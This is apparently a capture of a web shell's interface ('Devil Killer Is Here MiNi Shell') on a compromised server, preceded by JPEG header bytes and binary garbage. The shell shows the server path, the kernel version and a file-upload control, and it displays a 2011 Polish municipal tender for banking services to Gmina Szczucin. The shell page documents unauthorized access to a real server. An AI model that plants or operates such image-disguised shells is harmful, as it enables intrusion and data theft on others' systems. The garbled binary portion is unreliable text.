JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111018/272833-N-2011.html

<p class="kh_header"><b>Szczucin: Bankowa obsługa budżetu Gminy Szczucin w latach 2012-2015</b><br>
<b>Numer ogłoszenia: 272833 - 2011; data zamieszczenia: 18.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Szczucin , ul. Wolności 3, 33-230 Szczucin, woj. małopolskie, tel. 014 6436278, faks (014) 643 64 90.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szczucin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bankowa obsługa budżetu Gminy Szczucin w latach 2012-2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje bankową obsługę budżetu Gminy Szczucin, jej organu oraz samorządowych jednostek organizacyjnych i zakładu budżetowego w latach 2012 - 2015 według poniższego zestawienia:
1.Zespół Szkolno-Przedszkolny w Delastowicach
2.Szkoła Podstawowa im. A. Mickiewicza w Szczucinie
3.Zespół Szkół w Borkach
4.Szkoła Podstawowa w Dąbrowicy
5.Zespół Szkolno-Przedszkolny w Maniowie
6.Zespół Szkolno-Przedszkolny w Skrzynce
7.Zespół Szkolno-Przedszkolny w Słupcu
8.Szkoła Podstawowa im. Jana Pawła II w Zabrniu
9.Gimnazjum im. Bohaterów Września w Szczucinie
10.Gimnazjum w Radwanie
11.Szkoła Podstawowa w Borkach im. 1 Armii Wojska Polskiego
12.Gminny Zespół Oświaty - Dowóz uczniów
13.Gminny Zespół Oświaty w Szczucinie
14.Przedszkole Publiczne w Szczucinie
15.Przedszkole Publiczne w Borkach
16.Przedszkola Publiczne w Gminie Szczucin
17.Fundusz Świadczeń Socjalnych Zespołu Szkół w Borkach
18.Fundusz Świadczeń Socjalnych Szkoła Podstawowa w Dąbrowicy
19.Fundusz Świadczeń Socjalnych Szkoła Podstawowa w Delastowicach
20.Fundusz Świadczeń Socjalnych Szkoła Podstawowa w Maniowie
21.Fundusz Świadczeń Socjalnych Szkoła Podstawowa w Skrzynce
22.Fundusz Świadczeń Socjalnych Szkoła Podstawowa w Szczucinie
23.Fundusz Świadczeń Socjalnych Szkoła Podstawowa w Zabrniu
24.Fundusz Socjalny Zespół Szkolno Przedszkolny Słupiec
25.Fundusz Świadczeń Socjalnych Gimnazjum w Szczucinie
26.Fundusz Świadczeń Socjalnych Gimnazjum w Radwanie
27.Fundusz Świadczeń Socjalnych Gminny Zespół Oświaty
28.Fundusz Świadczeń Socjalnych Przedszkole Publiczne Szczucin
29.Fundusz Świadczeń Socjalnych Przedszkole Borki
30.Urząd Miasta i Gminy w Szczucinie
31.Rachunek dochodów Budżetu Gminy Szczucin
32.Fundusz Świadczeń Socjalnych Urzędu Miasta i Gminy
33.Rachunek Sum Depozytowych
34.Samorządowe Centrum Kultury i Bibliotek 
35.Miejsko - Gminny Ośrodek Pomocy Społecznej 
36.Zakład Usług Komunalnych
37.Kaucje Gwarancyjne
38.Inne rachunki otwierane doraźnie dla potrzeb realizowanych zadań współfinansowanych ze środków zagranicznych w szczególności z Unii Europejskiej.

W ramach bankowej obsługi, o której mowa wyżej wykonawca (bank) będzie świadczył na rzecz Zamawiającego następujące usługi:
1. Otwarcie i prowadzenie rachunków szczegółowo wymienionych w Zarządzeniu Burmistrza Miasta i Gminy Szczucin nr 00152/60/2011 z  dnia 8 października 2011r.
2. Realizację poleceń przelewu na rachunki zamawiającego w banku obsługującym
3. Realizację poleceń przelewu na rachunki w innych bankach
4. Przyjmowanie wpłat gotówkowych 
Przyjmowaniu otwartych  wpłat  gotówkowych   własnych.  Za  wpłaty   własne  uważa    się     wpłaty  dokonywane  pod  pieczęcią Zamawiającego i jego  jednostek organizacyjnych, wpłaty inkasentów podatków i opłat Zamawiającego oraz wpłaty dokonywane na rzecz Zamawiającego
5. Dokonywanie wypłat gotówkowych 
Dokonywanie wypłat gotówkowych na podstawie zleceń wypłat elektronicznych lub na podstawie wystawionych czeków gotówkowych (na  bezpłatnie wydanych przez Bank blankietach).
6. Potwierdzanie stanu salda na każdy dzień roboczy (wyciągi bankowe) 
Potwierdzaniu  stanu  salda dokonywanych operacji   bankowych  na każdy dzień roboczy, w   którym  dokonano    operacji, na wszystkich   rachunkach   bieżących  i  pomocniczych (wyciągi bankowe) z ustaleniem salda i załącznikami do każdej transakcji stanowiącymi opis transakcji, dokładny    opis operacji, oznaczenie zleceniodawcy transakcji, beneficjenta środków, ze wskazaniem kont bankowych stron, tytułu, kwoty operacji, daty obciążenia  konta zleceniodawcy, daty księgowania (dzienne wyciągi bankowe elektroniczne generowane kompletnie w jednym ciągu opcji programu lub  bezpłatne papierowe w sytuacji braku odpowiedniej opcji w systemie  elektronicznym). Duplikaty tylko do jednego rachunku podstawowego Gminy.
7. Obsługę wypłat zasiłków rodzinnych, pielęgnacyjnych itp.
8. Uruchomienie kredytu w rachunku bieżącym do wysokości określonej w uchwałach budżetowych Rady Miejskiej
9. Przyjmowanie lokat jednodniowych ( nocnych), weekendowych, tygodniowych, dwutygodniowych, miesięcznych;
10. Uruchomienie oraz prowadzenie usługi bankowości elektronicznej w  siedzibie Zamawiającego oraz w pozostałych jednostkach organizacyjnych;
11. Realizowaniu poleceń przelewów w formie papierowej i/lub elektronicznej, 
12. Zapewnieniu serwisu elektronicznej obsługi rachunków. 
Zamawiający oczekuje, aby Bank prowadził usługi bankowości elektronicznej, które umożliwią dokonywanie operacji drogą elektroniczną, umożliwią składanie elektronicznie poleceń przelewów w tym paczek przelewów, umożliwią uzyskanie elektronicznej informacji o stanie rachunków oraz umożliwi podgląd sald i innych informacji dotyczących rachunków. Zamawiający oczekuje, aby Bank dostarczył i zainstalował na 10 stanowiskach oprogramowanie umożliwiające korzystanie z systemu i aby aktualizował wersje oprogramowania. Niezbędnym jest też przeszkolenie pracowników Zamawiającego i dostarczenie instrukcji użytkownika elektronicznego systemu obsługi bankowej. Zamawiający oczekuje, aby Bank w ramach usługi serwisowej systemu realizował stałą i kompleksową opiekę nad systemem, w tym nadzór i kontrolę nad integralnością struktury systemu tak, aby  zapewnić prawidłową pracę urządzeń komputerowych i sprawne funkcjonowanie systemu, a także by niósł pomoc telefoniczną w zakresie obsługi systemu dla użytkownika. 
13. Inne stosownie do potrzeb.

Warunki wymagane od wykonawcy (banku):
1. Wybrany wykonawca, z tytułu wykonywania czynności bankowej obsługi budżetu opisanych w przedmiocie zamówienia, nie będzie pobierał żadnych innych opłat i prowizji.
2. Z tytułu wykonywania, na doraźne zlecenie Zamawiającego, innych czynności poza opisanymi w przedmiocie zamówienia wykonawca (bank) będzie pobierał opłaty i prowizje zgodnie z obowiązującą w banku oficjalną tabelą opłat i prowizji, stanowiącą załącznik do umowy. 
3. Za czynność polegającą na potwierdzaniu stanu salda na każdy dzień roboczy (wyciąg bankowy) wykonawca (bank) nie będzie pobierał żadnych opłat i prowizji.
 4. Za czynność polegającą na realizacji poleceń przelewu na rachunki w banku obsługującym nie będą pobierane żadne prowizje i opłaty.
5. Za czynności polegające na przyjmowaniu wpłat gotówkowych oraz dokonywaniu wypłat gotówkowych na rzecz Zamawiającego wykonawca (bank) nie będzie pobierał żadnych prowizji i opłat. 
6. Wysokość kwoty opłat i prowizji wynikających z oferty jak też opłat i prowizji nie objętych przedmiotem zamówienia możliwych do doraźnego zlecania, których tabela opłat i prowizji stanowi załącznik do umowy nie podlega waloryzacji w okresie obowiązywania umowy.
7. Stopa oprocentowania kredytu w rachunku bieżącym będzie obliczana w oparciu o średnią stawkę WIBOR 1 M z miesiąca poprzedzającego miesiąc odsetkowy powiększoną o marżę banku. Od przyznanego kredytu wykonawca (bank) nie będzie pobierał żadnych innych prowizji i opłat.
8. Oprocentowanie lokat krótko i długoterminowych obliczane będzie według stawek referencyjnych rynku międzybankowego WIBID z dnia poprzedzającego zawarcie transakcji z godziny 11-tej prezentowanej w systemie Reuters pomniejszonych o marżę banku. Od ww lokat wykonawca (bank) nie będzie pobierał żadnych innych prowizji i opłat. 
9. Przedmiot zamówienia będzie zrealizowany w całości w okresie od 01 stycznia 2012 r. do 31 grudnia 2015 r.  
10. Wykonawca musi posiadać swoją siedzibę, lub oddział, lub filię, lub punkt kasowy w miejscowości Szczucin w celu wykonywania czynności bankowych będących przedmiotem niniejszego zamówienia.
  11. Wykonawca zapewni wykonywanie czynności związanych z obsługą bankową budżetu Gminy Szczucin i jej jednostek organizacyjnych w dni robocze w godzinach od 8  do 15.
	Pozostałe warunki zostały przedstawione we wzorze Umowy w Rozdziale D  specyfikacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeżeli złoży oświadczenie o posiadaniu uprawnień do wykonywania działalności związanej z realizacją przedmiotu zamówienia oraz złoży zezwolenie lub inny dokument dotyczący utworzenia banku i uprawniający do wykonywania czynności bankowych zgodnie z ustawą z dnia 29 sierpnia 1997 r. Prawo bankowe (Dz.U. z 2002 r. Nr 72 poz. 665 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym celu Wykonawca powinien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert należycie prowadził przynajmniej jedną obsługę budżetu jednostki samorządu terytorialnego i jej jednostek organizacyjnych o budżecie rocznym co najmniej 20 milionów złotych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, lub świadczenie tych usług jest w toku

Opis sposobu dokonania oceny spełnienia tego warunku:
Wykonawca spełni ten warunek jeżeli złoży oświadczenie, że posiada wiedzę i doświadczenie niezbędne do wykonania zamówienia oraz złoży załącznik Nr 2 - Informacje na temat doświadczenia - wraz z wykazem  wykonanych,  a w przypadku  świadczeń  okresowych  lub  ciągłych  również  wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat  przed  upływem  terminu  składania  ofert,  a  jeżeli  okres  prowadzenia  działalności  jest  krótszy  -  w   tym okresie,   z   podaniem   ich  wartości,  przedmiotu,  dat  wykonania  i  odbiorców,  oraz  załączeniem  dokumentu      potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie,
a z dokumentów tych będzie wynikało, że w okresie ostatnich trzech lat przed upływem terminu składania ofert należycie prowadził przynajmniej jedną obsługę budżetu jednostki samorządu terytorialnego i jej jednostek organizacyjnych o budżecie rocznym co najmniej 20 milionów złotych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, lub świadczenie tych usług jest w toku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym celu Wykonawca powinien wykazać, że posiada swoją siedzibę, lub oddział, lub filię, lub punkt kasowy w miejscowości Szczucin w celu wykonywania czynności bankowych będących przedmiotem niniejszego zamówienia.

Opis sposobu dokonania oceny spełnienia tego warunku:
Wykonawca spełni ten warunek jeżeli złoży oświadczenie, że wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia oraz złoży załącznik Nr 3 - Wykaz wyposażenia - wraz z wykazem narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami,
a z dokumentów tych będzie wynikało, że Wykonawca posiada swoją siedzibę, lub oddział, lub filię, lub punkt kasowy w miejscowości Szczucin w celu wykonywania czynności bankowych będących przedmiotem niniejszego zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeżeli złoży oświadczenie, że wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeżeli złoży oświadczenie, że wykonawca  znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)Formularz ofertowy
b)Oświadczenie, o posiadaniu uprawnień do wykonywania działalności związanej z realizacją przedmiotu zamówienia;
c)Oświadczenie, że wykonawca posiada wiedzę i doświadczenie niezbędne do wykonania zamówienia;
d)Oświadczenie, że wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;  
e)Oświadczenie, że wykonawca  znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
f)Oświadczenie, że wykonawca  uważa się za związanego ofertą  na okres 30 dni (art.85 ust.1 pkt 1) i zobowiązuje się, w razie otrzymania zawiadomienia o wygraniu przetargu, podpisać umowę; 
g)Jeżeli  wykonawca wykazując spełnienie  warunków,  o  których  mowa  w  art.  22  ust.  1  ustawy  Prawo  zamówień  publicznych,  polega  na  zasobach  innych  podmiotów  na  zasadach  określonych  w  art.  26  ust.  2b  ustawy  Prawo  zamówień  publicznych, to Zamawiający  żąda  od  wykonawcy przedstawienia pisemnego zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia;
h)Pełnomocnictwo - w przypadku, gdy oferta będzie podpisywana przez osobę upoważnioną;
i)załącznik Nr 2 - Informacje na temat doświadczenia - Wykaz  wykonanych,  a    w  przypadku  świadczeń  okresowych  lub  ciągłych  również  wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat  przed  upływem  terminu  składania  ofert,  a  jeżeli  okres  prowadzenia  działalności  jest  krótszy  -  w   tym okresie,   z   podaniem   ich  wartości,  przedmiotu,  dat  wykonania  i  odbiorców,  oraz  załączeniem  dokumentu      potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie - należy wypełnić tabelę według załączonego do SIWZ wzoru;
j)Załącznik Nr 3 - Wykaz wyposażenia - wraz z wykazem narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami - należy wypełnić tabelę według załączonego do SIWZ wzoru;
k)Załącznik Nr 4 - Cena oferty - należy uzupełnić informacje i wypełnić tabelę według załączonego do SIWZ wzoru;
l)W przypadku wnoszenia wspólnej oferty przez konsorcjum składające się z dwóch lub więcej podmiotów gospodarczych, należy dołączyć oświadczenie wykonawców, że ich zobowiązania co do oferty oraz co do wykonania oferty są solidarne. Oferta taka musi spełniać następujące wymagania:
- zawierać dokumenty i oświadczenia wymienione powyżej;
- musi być podpisana w taki sposób, by zobowiązywała prawnie wszystkie strony;
- jeden z podmiotów zostanie wyznaczony jako odpowiedzialny i jego upoważnienie będzie udokumentowane pełnomocnictwem do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.9</li>
<li>2 - marża banku dla kredytów w rachunku bieżącym wyrażona w [ % ] - 0.05</li>
<li>3 - marża banku dla lokat krótko i długoterminowych wyrażona w [ % ] - 0.05</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Strony niniejszej umowy dopuszczają zmiany  niniejszej  umowy  zgodnie  z  art.  144 ust.  1 ustawy  Prawo zamówień  publicznych  i  ustalają,  że  dotyczyć  one  mogą  zakresu  usług stanowiących przedmiot umowy, jeżeli wynikają z następujących okoliczności: 
a)  podyktowane  zostaną  zmianami  przepisów  prawa,  wprowadzonymi  po  podpisaniu niniejszej umowy, 
b)  na  Gminę  zostaną  nałożone  nowe  zadania  lub zmieni się struktura  organizacyjna Gminy, 
c)  pojawią  się nowe  korzystne dla Gminy produkty bankowe lub rozwiązania     organizacyjne, których wykorzystanie będzie korzystne dla Gminy, 
d)  wprowadzona zostanie modyfikacja systemów informatycznych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szczucin.pl<br>
